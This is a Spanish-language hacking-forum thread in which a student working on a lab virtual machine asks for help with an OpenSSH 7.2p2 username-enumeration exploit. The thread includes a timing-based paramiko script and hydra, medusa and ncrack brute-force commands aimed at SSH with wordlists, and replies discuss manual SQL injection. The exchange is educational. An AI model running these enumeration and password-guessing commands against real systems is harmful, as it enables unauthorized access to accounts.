elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Exploit OpenSSH7.2_p2
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Exploit OpenSSH7.2_p2  (Leído 4,279 veces)
Gsusseppe84

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Exploit OpenSSH7.2_p2
« en: 14 Mayo 2018, 19:16 pm »

Buenas a todos,

Tengo una máquina virtual de la cual tengo que obtener las credenciales de acceso. Una vez escaneado los puertos y visto vulnerabilidades, encuentro una vulnerabilidad en el puerto 22 para la tecnología OPENSSH7.2_p2 "enumeration username".

Procedo a descargar el archivo 40136.py y a ejecutarlo a través del comando

Desktop# 40136.py -U unix_users.txt 192.168.xxx.xxx


Utilizo para ello muchas diccionarios, pero nada de nada
 - rockyou.txt
- namelist.txt
- apache-user-enum-1.0.txt
- etc.

Procedo a utilizar otras herramientas y sigo sin avanzar.

NCRACK;  -p22 -U rockyou.txt -P rockyou.txt 192.168.xxx.xxx
MEDUSA;  -U rockyou.txt -P rockyou.txt -h 192.168.xxx.xxx -M ssh
HYDRA:  hydra -l user -P rockyou.txt ssh://192.168.xxx.xxx

ALguna Idea??? Soy principiante al respecto muchas gracias

Adjunto contenido del archivo py

Sample code:
----------------
import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
        ssh.connect('127.0.0.1', username=user,
        password=p)
except:
        endtime=time.clock()
total=endtime-starttime
print(total)

En línea

hex0r

Desconectado Desconectado

Mensajes: 19



Ver Perfil
Re: Exploit OpenSSH7.2_p2
« Respuesta #1 en: 15 Mayo 2018, 19:35 pm »

te da error de algun tipo el .py?
En línea

Gsusseppe84

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Exploit OpenSSH7.2_p2
« Respuesta #2 en: 15 Mayo 2018, 19:40 pm »

dices al ejecutarlo desde la consola? ninguno.

la duda realmente es si lo estoy ejecutando bien el exploit.
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Exploit OpenSSH7.2_p2
« Respuesta #3 en: 15 Mayo 2018, 19:43 pm »

primera pregunta importante... la contraseña está en el diccionario? si no, no haces nada, agregala
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Gsusseppe84

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Exploit OpenSSH7.2_p2
« Respuesta #4 en: 19 Mayo 2018, 11:56 am »

No, la contraseña no sé si esta en alguna de ellas. De ahí que pruebe con varios listas de diccionarios.

Mi primera opción (sin entrar en el detalle de la vulnerabilidad en Open SSH) fue obtener las credenciales de acceso y contraseña a través de sqlmap. Sin embargo, en este servidor de prueba no es posible hacerlo de esa manera (así me dijo mi tutor). De hecho mi tutor me dijo que tenía que hacer la injection de forma manual.

Por tanto, entendí que primero debía explotar esta vulnerabilidad de OpenSSH para obtener el usuario, y luego ya después, la contraseña, intentar engañar al servidor a través de consultas falsas.

gracias
En línea

animanegra

Desconectado Desconectado

Mensajes: 287



Ver Perfil
Re: Exploit OpenSSH7.2_p2
« Respuesta #5 en: 19 Mayo 2018, 13:03 pm »

¿Pero si te ha comentado que debías realizar una inyeccion de sql de forma manual que haces intentando entrer por ssh?

El exploit del ssh sólo te va a permitir como mucho la enumeración de usuarios, oséa saber que nombres de usuarios existen y seguramente, no he leido el fallo concreto, se base en el tiempo de conexion al ssh para deducir si el nombre de usuario que has metido es correcto o no. De manera que a no ser que tengas un listado de usuarios entre los que sepas que esté el usuario de ssh de ese ordenador poco vas a poder sacar de ahi.

Si el profesor te ha comentado de hacer las inyecciones de SQL a mano, yo tiraría por realizar inyecciones de SQL a mano con lo que hayáis dado en clase. Probablemente el nombre de usuario valido para el ssh lo saques de ahi, o simplemente no haga falta conexion por ssh porque puedas directamente ejecutar codigo remoto mediante un file upload en el sistema web que tengais.
En línea


42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.
Gsusseppe84

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Exploit OpenSSH7.2_p2
« Respuesta #6 en: 20 Mayo 2018, 18:32 pm »



Lo primero que intente fue realizar la inyeccion de sql de forma manual, pero después de utilizar infinitas consultas tanto en el campo usuario como en el de Contraseña, y ver que no podía acceder, deduje a raíz de la búsqueda de vulnerabilidades, que al haber una vulnerabilidad en OpenSSH y al existir un exploit podía obtener un posible usuario, y luego ya introducir en contraseña una consulta para intentar engañarla.

Pero ya veo que no es así. Entiendo que debo introducir tanto en usuario como en contraseña la misma sentencia no?

En línea

animanegra

Desconectado Desconectado

Mensajes: 287



Ver Perfil
Re: Exploit OpenSSH7.2_p2
« Respuesta #7 en: 21 Mayo 2018, 19:50 pm »

Las inyecciones sql se pueden intentar meter en todos los inputs de usuario de una web no solo en el usuario y la contraseña. Si tu profesor te ha dicho que hay un sql injection, prueba o otro tipo de inyecciones o en otros campos de usuario.

No entiendo tu última pregunta.

Los ataques de enumeración se suelen basar en que si pruebas un usuario valido, a pesar de no saber introducido la contraseña correcta tarda un tiempo diferente en decir password failled que si insertas un usuario invalido. Con esa diferencia de tiempos podrías llegar a sacar si un usuario es valido o no, pero no una contraseña. La vulnerabilidad del Openssh de tipo enumarion, puede que séa del tipo que te digo, pero no obstante tendras que mirarlo tu. En principio algo vulnerable a enumeración no te va a permitir ejecutar código remoto o obtener contrasñas de objetivos, como mucho , en principio, podrás obtener nombres de usuario validos.
 
En línea


42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Exploit] Error al Compilar exploit (Solucionado)
Bugs y Exploits
moikano→@ 4 4,820 Último mensaje 10 Noviembre 2011, 15:28 pm
por moikano→@
[Exploit] me sale errror al intentar compilar el exploit half-nelson
Bugs y Exploits
moikano→@ 6 10,804 Último mensaje 24 Noviembre 2011, 22:46 pm
por moikano→@
Como actualizar el repositoria de exploit de metasploit o agregar el exploit
Hacking
DamnSystem 0 3,042 Último mensaje 16 Junio 2017, 18:39 pm
por DamnSystem
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines